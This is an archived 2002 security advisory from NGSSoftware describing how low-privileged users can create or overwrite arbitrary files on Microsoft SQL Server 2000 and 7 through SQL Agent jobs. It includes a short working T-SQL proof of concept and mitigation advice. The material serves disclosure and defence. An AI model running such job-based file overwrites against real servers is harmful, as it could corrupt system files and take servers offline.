OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: NGSSoftware Insight Security Research (nisr_at_nextgenss.com)
Date: Mon Aug 19 2002 - 09:46:50 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    NGSSoftware Insight Security Research Advisory

    Name: Arbitrary File Creation/Overwrite with SQL Agent Jobs
    Systems: Microsoft SQL Server 2000 and 7
    Severity: High Risk
    Category: Arbitrary File Creation/Overwrite
    Vendor URL: http://www.microsoft.com/
    Author: David Litchfield (davidngssoftware.com)
    Advisory URL: http://www.ngssoftware.com/advisories/mssql-espjobs2.txt
    Date: 19th August 2002
    Advisory number: #NISR19002002A

    Description
    ***********
    With Microsoft SQL Server 2000 and 7 comes a "helper" service, the SQL
    Server agent. The Agent is responsible for restarting the database service
    if it stops for some reason, has a role to play in replication and runs
    scheduled jobs. As the public role can submit jobs to the SQL Agent, by
    default, a low pirviliged user can create or overwrite arbitray files on the
    SQL Server.

    Details
    *******
    When adding a job one can specify the name of a file to output the results
    of the Transact-SQL or CmdExec Job to. If this already exists it can be
    ovewritten and if it doesn't exist already a new file will be created. By
    crafting the query of the job one can place arbitrary contents in this file.

    If the SQL Server Agent is running with Local SYSTEM privileges an attacker
    will be able to overwrite key operating system files rendering the server
    unbootable.

    Proof of Concept
    ****************
    -- ArbitraryFileCreate
    -- For this to work the SQL Agent should be running.
    -- Further, you'll need to change SERVER_NAME in
    -- sp_add_jobserver to the SQL Server of your choice 

    --
-- David Litchfield
-- (davidngssoftware.com)
-- 19th August 2002

    USE msdb

    EXEC sp_add_job job_name = 'ArbitraryFileCreate',
enabled = 1,
description = 'This will create a file called c:\sqlafc123.txt',
delete_level = 1

    EXEC sp_add_jobstep job_name = 'ArbitraryFileCreate',
step_name = 'SQLAFC',
subsystem = 'TSQL',
command = 'select ''hello, this file was created by the SQL Agent.''',
output_file_name = 'c:\sqlafc123.txt'

    EXEC sp_add_jobserver job_name = 'ArbitraryFileCreate',
server_name = 'SERVER_NAME'

    EXEC sp_start_job job_name = 'ArbitraryFileCreate'

    Fix Information
***************
NGSSoftware informed Microsoft of these issues in July. To prevent low
privileged users from submitting jobs one should disallow public access to
the Job related stored procedures in the MSDB database particularly

    sp_add_job
sp_add_jobstep
sp_add_jobserver
sp_start_job

    Further to this ensure that the SQL Server Agent is running as a low
privileged NT account.